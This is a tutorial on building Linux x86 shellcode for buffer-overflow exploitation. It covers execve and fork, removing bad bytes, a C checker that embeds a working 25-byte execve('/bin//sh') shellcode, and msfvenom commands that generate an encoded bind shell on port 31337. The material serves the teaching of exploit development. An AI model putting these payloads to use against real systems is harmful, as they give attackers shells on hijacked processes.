
Creating Shellcode

Shellcode is the payload delivered through a memory-corruption bug such as a stack buffer overflow: once the overwritten return address (or other control data) redirects execution into the attacker's bytes, those bytes run as machine code inside the vulnerable process.

Shellcode is made of raw opcodes that set up registers and issue system calls directly (on Linux x86, execve via int 0x80), so it needs no libc and no relocation. It runs in ring 3 with the privileges of the process it hijacked; it does not move into ring 0 or get kernel access. The classic payload spawns a shell, which is where the name comes from, and if the hijacked process is setuid root or a root-owned service, that shell is a root shell.

5 Steps to Create

  1. Write high-level code: a small C program that makes the system call you want, e.g. execve("/bin/sh", ...).
  2. Compile and disassemble (gcc, then objdump -d or gdb).
  3. Analyze the assembly and keep only the instructions that set up and issue the system call.
  4. Clean up the assembly: remove null bytes and other bad characters, and make it position independent (no absolute addresses).
  5. Extract the opcode bytes and assemble them into the shellcode string.

Gaining the Shell

There are two ways to get a shell process on Linux:

  • execve() - replaces the current process image with the shell; no new process is created, and on success it never returns. It takes 3 arguments: a pointer to the path of the shell (e.g. "/bin/sh"), a pointer to a NULL-terminated argv array, and a pointer to a NULL-terminated array of environment variables (NULL is accepted for an empty environment).
  • fork() + execve() - fork() creates a copy of the running process; the child calls execve() to become the shell while the parent keeps running. Plain execve() is shorter, so most shellcode uses it.
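The two approaches side by side, as an added example rather than code from the original page. It is the "high-level code" of step 1: a plain C program that does, through libc, what the shellcode will later do in raw opcodes. The script argument and the helper names are this example's own; the shell is /bin/sh as in the notes.

```c
#include <stdio.h>
#include <sys/wait.h>
#include <unistd.h>

/* Step 1 of the notes in C: the three execve() arguments from the list above,
 * spelled out. On success execve() never returns: the calling process is now
 * the shell. Only a failure reaches the lines after it. */
static int exec_shell(const char *script)
{
    char *argv[] = { "/bin/sh", "-c", (char *)script, NULL }; /* NULL-terminated argv */
    char *envp[] = { NULL };                                   /* empty environment */
    execve("/bin/sh", argv, envp);
    perror("execve");
    return 127;
}

/* fork() + execve(): the child is a copy of this process and turns itself into
 * the shell; the parent survives, waits, and reports the child's exit status.
 * Returns that status, or -1 if fork()/waitpid() fails or the child was killed. */
int run_shell_with_fork(const char *script)
{
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0)
        _exit(exec_shell(script));   /* child; only reached if execve() failed */
    int status;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void)
{
    /* The script is this example's own choice; "exit 7" makes the status visible. */
    int rc = run_shell_with_fork("echo hello from the child shell; exit 7");
    printf("child shell exited with status %d\n", rc);
    /* Plain execve(): uncomment the next line and nothing after it runs, this
     * process becomes /bin/sh. That is the form shellcode normally takes. */
    /* return exec_shell("exec /bin/sh"); */
    return 0;
}
```

Note that the parent only learns the child's status because fork() left it alive; in the execve()-only form there is nobody left to wait, which is exactly why exploit shellcode can afford to skip fork().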

Caveats

  • Some byte values cannot appear anywhere in the shellcode: the vulnerable program's input routine treats them as terminators, so the copy stops there and the rest of the payload never lands in memory. Any instruction whose encoding contains such a byte has to be rewritten as an equivalent instruction without it:
    • mov ebx,0 (BB 00 00 00 00) => xor ebx,ebx (31 DB)
    • mov eax,1 (B8 01 00 00 00) => mov al,1 (B0 01), with eax zeroed first by xor eax,eax so the upper three bytes are known to be zero

The bytes that cut a payload short depend on how the target reads its input; the usual ones to exclude are:

  • null byte (0x00) - ends the copy in strcpy(), strcat(), sprintf() and any other C-string function
  • line feed (0x0A) - ends the read in gets(), fgets() and other line-oriented input
  • carriage return (0x0D) - treated as end of line by some inputs and text protocols
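Steps 4 and 5 together with the bad-byte caveats above, worked as an added example that is not part of the original page. It embeds the widely published 25-byte Linux x86 execve("/bin//sh") shellcode (an assumption about the target: 32-bit Linux with the int 0x80 calling convention), shows the exact byte encodings behind the mov/xor rewrites in the list, scans any byte string for the three terminator bytes, and renders the result as a "\x.." string ready to paste into an exploit. The function names are this example's own.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* The page's list of bytes that truncate a string-delivered payload. The set
 * to avoid is really decided by how the target reads input; adjust as needed. */
static const unsigned char BAD_BYTES[] = { 0x00, 0x0a, 0x0d };

/* Widely published Linux x86 execve("/bin//sh", ["/bin//sh"], NULL) shellcode
 * (25 bytes, not from this page). "//sh" pads the path to 8 bytes so it fits
 * two pushes with no NUL inside an immediate:
 *   31 c0            xor eax,eax        ; eax = 0 without "mov eax,0"
 *   31 d2            xor edx,edx        ; envp = NULL
 *   50               push eax           ; NUL terminator of the path string
 *   68 2f 2f 73 68   push 0x68732f2f    ; "//sh"
 *   68 2f 62 69 6e   push 0x6e69622f    ; "/bin"
 *   89 e3            mov ebx,esp        ; ebx -> "/bin//sh"
 *   50               push eax           ; argv[1] = NULL
 *   53               push ebx           ; argv[0] = path
 *   89 e1            mov ecx,esp        ; ecx -> argv
 *   b0 0b            mov al,0x0b        ; __NR_execve; upper bytes already 0
 *   cd 80            int 0x80
 */
static const unsigned char SHELLCODE[] =
    "\x31\xc0\x31\xd2\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e"
    "\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80";
#define SHELLCODE_LEN (sizeof(SHELLCODE) - 1)

/* The two rewrites from the caveats list, as their encoded bytes. */
static const unsigned char MOV_EBX_0[]   = { 0xbb, 0x00, 0x00, 0x00, 0x00 }; /* mov ebx,0 */
static const unsigned char XOR_EBX_EBX[] = { 0x31, 0xdb };                   /* xor ebx,ebx */
static const unsigned char MOV_EAX_1[]   = { 0xb8, 0x01, 0x00, 0x00, 0x00 }; /* mov eax,1 */
static const unsigned char MOV_AL_1[]    = { 0xb0, 0x01 };                   /* mov al,1 */

/* Step 4 check: how many bytes of code[0..len) are in BAD_BYTES. */
size_t count_bad_bytes(const unsigned char *code, size_t len)
{
    size_t hits = 0;
    for (size_t i = 0; i < len; i++)
        if (memchr(BAD_BYTES, code[i], sizeof BAD_BYTES) != NULL)
            hits++;
    return hits;
}

/* Offset of the first bad byte, or len when the code is clean. */
size_t first_bad_offset(const unsigned char *code, size_t len)
{
    for (size_t i = 0; i < len; i++)
        if (memchr(BAD_BYTES, code[i], sizeof BAD_BYTES) != NULL)
            return i;
    return len;
}

/* Step 5: render the bytes as a C/Python-style "\xNN" string into out.
 * Returns the number of characters written (4 per byte); stops early rather
 * than overflow, and always leaves out NUL-terminated. */
size_t format_escaped(const unsigned char *code, size_t len, char *out, size_t outsz)
{
    size_t n = 0;
    for (size_t i = 0; i < len && n + 4 < outsz; i++)
        n += (size_t)snprintf(out + n, outsz - n, "\\x%02x", code[i]);
    if (outsz)
        out[n] = '\0';
    return n;
}

static void report(const char *name, const unsigned char *code, size_t len)
{
    char buf[256];
    size_t hits = count_bad_bytes(code, len);
    format_escaped(code, len, buf, sizeof buf);
    if (hits)
        printf("%-12s %s -> %zu bad byte(s), first at offset %zu\n",
               name, buf, hits, first_bad_offset(code, len));
    else
        printf("%-12s %s -> clean\n", name, buf);
}

int main(void)
{
    report("mov ebx,0", MOV_EBX_0, sizeof MOV_EBX_0);
    report("xor ebx,ebx", XOR_EBX_EBX, sizeof XOR_EBX_EBX);
    report("mov eax,1", MOV_EAX_1, sizeof MOV_EAX_1);
    report("mov al,1", MOV_AL_1, sizeof MOV_AL_1);
    report("execve sc", SHELLCODE, SHELLCODE_LEN);
    return 0;
}
```

The checker is portable and is worth running over msfvenom output as well; actually executing the embedded bytes needs a 32-bit build (cc -m32) and an RWX mapping, which is a separate harness.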

To see which system calls an executable actually makes at run time (useful in step 3 to confirm which call the reference program ends in, and later to watch the shellcode reach execve), we can run:

strace -f /path/to/executable

-f follows children created by fork(), which matters for the fork() + execve() variant; add -e trace=execve to show only that call.

msfvenom

We can use msfvenom from the Metasploit toolkit to generate shellcode.

List payloads

msfvenom -l payloads | grep linux | grep bind_tcp

Generate Shellcode

To generate a bind shell for Linux x86 that listens on port 31337, exits cleanly when the shell closes (AppendExit=true), is run through the x86/alpha_mixed encoder, and is written out as a Python string:

msfvenom -p linux/x86/shell_bind_tcp LPORT=31337 AppendExit=true --encoder x86/alpha_mixed -f python -o $OUTPUT_PATH.py

Two caveats. The alpha_mixed decoder has to find its own address at run time; unless you pass BufferRegister=<reg> naming a register that points at the payload when it starts executing, msfvenom prepends a short GetPC stub that is not alphanumeric, so inspect the output before assuming the whole buffer is clean. And if the goal is only to avoid the terminator bytes from the caveats above, pass them as -b '\x00\x0a\x0d' instead of choosing an encoder yourself and let msfvenom pick one that satisfies the constraint.

List of platforms:

msfvenom --list platforms